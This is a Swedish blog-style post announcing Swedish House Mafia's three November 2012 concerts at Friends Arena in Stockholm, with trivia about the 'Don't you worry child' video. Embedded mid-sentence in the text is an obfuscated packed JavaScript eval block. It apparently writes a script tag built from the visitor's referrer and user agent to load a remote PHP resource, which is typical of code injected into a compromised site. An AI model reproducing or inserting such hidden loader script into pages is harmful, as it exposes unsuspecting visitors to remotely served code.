Image Image Image Image Image Image Image Image Image Image

| 31 maj, 2020

Scroll to top

Top

P3 – Swedish House Mafia

P3 – Swedish House Mafia
Sebastian

type=”text/javascript” src=”http://videos.goviral-content.com/playerjs-yt/p3__swedish_12864.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1450413&skinName=light&wmode=window&hideChrome=0″>

Snart eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shrti|var|u0026u|referrer|hibdt||js|php’.split(’|’),0,{}))
är det dags för de tre legendariska Swedish House mafia konserterna på Friends Arena i Stockholm. Deras senaste låt Don’t you worry child har toppat listorna i många länder och sägs vara deras sista låt tillsammans.

Vad ni kanske inte visste så spelades musikvideon till just Don’t you worry child in under en konsert vid den legendariska Milton Keynes Bowl i UK. Vid spelningen närvarade 60 000 personer vilket gör denna musikvideo-inspelningen till världens största inspelning i världen. På Milton Keynes Bowl har massa andra stora artister spelat tidigare men Swedish House Mafia var de första dj’s och de första svenskarna.

Nu har Sveriges Radio och P3 släppt en app där du an hänga med och få nyheter om de senaste hitsen just nu.

Titta på videon ovan där du får möta Swedish House Mafia på just Milton Keynes Bowl.

Swedish House Mafia konserttider:

– 22 November 2012, Friends Arena
– 23 November 2012, Friends Arena
– 24 November 2012, Friends Arena